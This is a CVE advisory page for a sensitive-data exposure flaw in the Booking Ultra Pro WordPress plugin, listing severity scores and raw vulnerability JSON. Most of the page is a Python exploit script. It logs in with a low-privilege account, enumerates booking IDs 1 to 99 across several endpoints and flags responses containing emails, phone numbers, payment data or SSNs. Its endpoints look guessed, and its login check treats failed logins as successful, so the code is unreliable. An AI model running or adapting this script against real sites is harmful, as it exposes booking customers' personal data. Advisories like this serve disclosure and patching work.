Security Vulnerability Report
中文
CVE-2025-68006 CVSS 6.5 MEDIUM

CVE-2025-68006

Published: 2026-01-22 17:16:07
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Deetronix Booking Ultra Pro booking-ultra-pro allows Retrieve Embedded Sensitive Data.This issue affects Booking Ultra Pro: from n/a through <= 1.1.23.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Booking Ultra Pro <= 1.1.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68006 PoC - Booking Ultra Pro Sensitive Data Exposure # This PoC demonstrates the information disclosure vulnerability # Requires: Valid WordPress account with low privileges (subscriber role) import requests import json from urllib.parse import urljoin # Configuration TARGET_URL = "https://vulnerable-site.com" # Replace with target URL USERNAME = "attacker" # Low privilege account PASSWORD = "password123" # Step 1: Authenticate and get session cookie def authenticate(): login_url = urljoin(TARGET_URL, "/wp-login.php") session = requests.Session() login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": "/wp-admin/" } response = session.post(login_url, data=login_data, allow_redirects=False) if "wordpress_logged_in" in str(session.cookies) or response.status_code in [200, 302]: print("[+] Authentication successful") return session else: print("[-] Authentication failed") return None # Step 2: Enumerate and retrieve sensitive booking information def extract_sensitive_data(session): # Target vulnerable API endpoint api_endpoints = [ "/wp-json/booking-ultra/v1/bookings", "/wp-admin/admin-ajax.php?action=bup_get_booking_details", "/?bup_action=view_booking&booking_id=" ] results = [] for endpoint in api_endpoints: # Enumerate booking IDs to retrieve data for booking_id in range(1, 100): if "admin-ajax" in endpoint: params = {"booking_id": booking_id} response = session.get( urljoin(TARGET_URL, endpoint), params=params ) else: response = session.get( urljoin(TARGET_URL, endpoint + str(booking_id)) ) # Check for sensitive data in response if response.status_code == 200: text = response.text # Look for sensitive patterns sensitive_keywords = ["email", "phone", "address", "payment", "ssn"] if any(keyword in text.lower() for keyword in sensitive_keywords): print(f"[!] Potential sensitive data found at {endpoint}{booking_id}") results.append({ "endpoint": endpoint, "booking_id": booking_id, "status": response.status_code, "content_length": len(response.content) }) return results # Main execution if __name__ == "__main__": print("CVE-2025-68006 PoC - Booking Ultra Pro Information Disclosure") print("=" * 60) session = authenticate() if session: print("[*] Extracting sensitive data...") findings = extract_sensitive_data(session) print(f"\n[+] Found {len(findings)} potential data leaks") print(json.dumps(findings, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68006", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:06.847", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Deetronix Booking Ultra Pro booking-ultra-pro allows Retrieve Embedded Sensitive Data.This issue affects Booking Ultra Pro: from n/a through <= 1.1.23."}, {"lang": "es", "value": "Vulnerabilidad de inserción de información sensible en datos enviados en Deetronix Booking Ultra Pro booking-ultra-pro permite recuperar datos sensibles incrustados. Este problema afecta a Booking Ultra Pro: desde n/a hasta &lt;= 1.1.23."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/booking-ultra-pro/vulnerability/wordpress-booking-ultra-pro-plugin-1-1-23-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}